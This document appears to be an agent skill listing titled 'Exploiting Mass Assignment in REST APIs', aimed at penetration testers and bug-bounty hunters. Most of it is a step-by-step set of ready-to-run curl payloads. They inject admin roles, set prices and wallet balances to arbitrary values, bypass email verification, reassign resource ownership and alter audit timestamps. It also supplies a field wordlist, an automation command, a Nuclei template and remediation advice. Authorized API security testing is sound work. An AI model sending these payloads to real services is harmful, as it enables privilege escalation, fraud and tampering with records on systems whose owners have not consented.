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Exploiting Mass Assignment in REST APIs

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Identify and exploit mass assignment vulnerabilities in APIs.

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What Exploiting Mass Assignment in REST APIs does

This skill provides a structured approach to discovering and exploiting mass assignment vulnerabilities in REST APIs, particularly those built on popular ORM frameworks like Rails, Django, Laravel, and Spring. By injecting unexpected or hidden parameters into API requests, users can test for privilege escalation and authorization bypass vulnerabilities. The skill leverages tools such as Burp Suite Intruder, Arjun, and param-miner to assist in identifying bindable fields and crafting malicious requests.

The workflow begins with discovering the API structure and fields, allowing users to examine API responses and documentation for potential mass assignment candidates. The skill guides users through testing various fields, including sensitive parameters like 'role', 'isAdmin', and financial fields such as 'balance' and 'price'. Each step is designed to help security testers methodically assess the API for weaknesses that could be exploited by an attacker.

This skill is particularly useful for security professionals engaged in API security assessments, bug bounty hunting, or evaluating role-based access control implementations. It provides practical examples and command-line scripts that can be adapted to specific testing scenarios, making it a valuable resource for anyone involved in API security testing.

It's important to note that this skill is intended for authorized security testing and educational purposes only. Users should ensure they have permission to test the APIs they are targeting to comply with legal standards.

When to use it

Use this skill during API security assessments, bug bounty hunting, or when testing applications that utilize ORM frameworks and may be susceptible to mass assignment issues.

When not to use it

This skill is not suitable for APIs that do not use ORM frameworks or where mass assignment vulnerabilities are not a concern.

What you can build with it

Testing User Registration

Evaluate the registration endpoint of an API to see if you can inject admin roles or other privileged parameters.

Assessing Profile Update Functionality

Check if the profile update API allows for unauthorized changes to sensitive fields like isAdmin or role.

Evaluating Financial Transactions

Test API endpoints related to financial transactions to see if balance or pricing can be manipulated through mass assignment.

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Written by mukul975

Exploiting Mass Assignment in REST APIs

When to Use

  • When testing REST APIs that accept JSON input for creating or updating resources
  • During API security assessments of applications using ORM frameworks (Rails, Django, Laravel, Spring)
  • When testing user registration, profile update, or account management endpoints
  • During bug bounty hunting on applications with CRUD API operations
  • When evaluating role-based access control implementation in API-driven applications

Prerequisites

  • Burp Suite or Postman for API request crafting and interception
  • Understanding of ORM auto-binding behavior in common frameworks
  • API documentation or endpoint discovery through reconnaissance
  • Multiple user accounts with different privilege levels for testing
  • Knowledge of common sensitive fields (role, isAdmin, verified, balance, price)
  • Arjun or param-miner for hidden parameter discovery

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Workflow

Step 1 — Discover API Structure and Fields

# Examine API responses to identify all object fields
curl -H "Authorization: Bearer USER_TOKEN" http://target.com/api/users/me | jq .
# Response reveals fields: id, username, email, role, isAdmin, verified, balance

# Check API documentation for exposed schemas
curl http://target.com/api/docs
curl http://target.com/swagger.json
curl http://target.com/openapi.yaml

# Use Arjun for hidden parameter discovery
arjun -u http://target.com/api/users/me -m JSON -H "Authorization: Bearer USER_TOKEN"

# Examine create/update request body vs response body
# The response may contain more fields than the request sends
# Those extra fields are mass assignment candidates

Step 2 — Test Privilege Escalation via Role Fields

# Inject role/admin fields in profile update
curl -X PUT http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"testuser","email":"test@test.com","role":"admin"}'

# Try common admin field names
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"isAdmin":true}'

curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"is_admin":true,"admin":true,"role":"superadmin","user_type":"admin","privilege_level":99}'

# Test during registration
curl -X POST http://target.com/api/register \
  -H "Content-Type: application/json" \
  -d '{"username":"newadmin","password":"pass123","email":"admin@evil.com","role":"admin","isAdmin":true}'

Step 3 — Test Financial and Business Logic Fields

# Modify price or balance fields
curl -X POST http://target.com/api/orders \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id":1,"quantity":1,"price":0.01}'

# Modify account balance
curl -X PATCH http://target.com/api/wallet \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"balance":999999}'

# Modify discount or coupon fields
curl -X POST http://target.com/api/checkout \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id":123,"discount_percent":100,"coupon_code":"NONE"}'

# Modify subscription tier
curl -X PATCH http://target.com/api/subscription \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"plan":"enterprise","price":0}'

Step 4 — Test Verification and Status Fields

# Bypass email verification
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email_verified":true,"verified":true,"active":true}'

# Modify account status
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"status":"active","banned":false,"suspended":false}'

# Modify ownership/organization
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"organization_id":"target-org-uuid","team_id":"admin-team"}'

Step 5 — Test Relationship and Foreign Key Manipulation

# Change resource ownership
curl -X PATCH http://target.com/api/documents/123 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"owner_id":"admin-user-id"}'

# Assign to different group/team
curl -X PATCH http://target.com/api/projects/456 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"team_id":"privileged-team","access_level":"write"}'

# Modify created_at/updated_at for audit log manipulation
curl -X PATCH http://target.com/api/entries/789 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"created_at":"2020-01-01","created_by":"other-user-id"}'

Step 6 — Automate Mass Assignment Testing

# Use Burp Intruder with field names wordlist
# Wordlist of common mass assignment fields:
# role, admin, isAdmin, is_admin, user_type, privilege, level
# verified, email_verified, active, banned, suspended
# balance, credits, price, discount, plan, tier
# owner_id, organization_id, team_id, group_id

# Python automation script
python3 mass_assignment_tester.py \
  --url http://target.com/api/users/me \
  --method PATCH \
  --token "Bearer USER_TOKEN" \
  --fields-file mass_assignment_fields.txt

# Nuclei mass assignment templates
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/mass-assignment.yaml

Key Concepts

ConceptDescription
Mass AssignmentORM auto-binding of request parameters to model attributes without restriction
AutobindingFramework feature that maps HTTP parameters directly to object properties
AllowlistServer-side list of permitted fields for update operations (strong_parameters in Rails)
DenylistList of forbidden fields (less secure than allowlist approach)
Hidden FieldsServer-managed fields (role, balance) not shown in forms but accepted by API
DTO (Data Transfer Object)Pattern using separate objects for input vs. database to prevent mass assignment
Parameter PollutionSending unexpected extra parameters alongside legitimate ones

Tools & Systems

ToolPurpose
Burp SuiteAPI request interception and parameter injection
PostmanAPI testing and collection-based mass assignment testing
ArjunHidden parameter discovery tool for API endpoints
param-minerBurp extension for discovering hidden parameters
OWASP ZAPAutomated API scanning with parameter injection
swagger-codegenGenerate API clients from OpenAPI specs for testing

Common Scenarios

  1. Admin Privilege Escalation — Inject "role":"admin" or "isAdmin":true in profile update to gain administrative access
  2. Price Manipulation — Modify price or discount fields in order creation endpoints to purchase items at reduced cost
  3. Email Verification Bypass — Set email_verified:true during registration or profile update to bypass verification requirements
  4. Account Takeover — Modify email or phone fields to attacker-controlled values, then trigger password reset
  5. Subscription Upgrade — Inject plan:"enterprise" in subscription update to gain premium features without payment

Output Format

## Mass Assignment Vulnerability Report
- **Target**: http://target.com/api/users/me
- **Method**: PATCH
- **Framework**: Ruby on Rails (detected via X-Powered-By)

### Findings
| # | Endpoint | Injected Field | Original | Modified | Impact |
|---|----------|---------------|----------|----------|--------|
| 1 | PATCH /api/users/me | role | "user" | "admin" | Privilege Escalation |
| 2 | POST /api/orders | price | 99.99 | 0.01 | Financial Loss |
| 3 | PATCH /api/users/me | email_verified | false | true | Verification Bypass |

### Remediation
- Implement allowlist (strong_parameters) for all model update operations
- Use DTOs/ViewModels to decouple API input from database models
- Apply field-level authorization checks on sensitive attributes
- Log and alert on attempts to modify restricted fields

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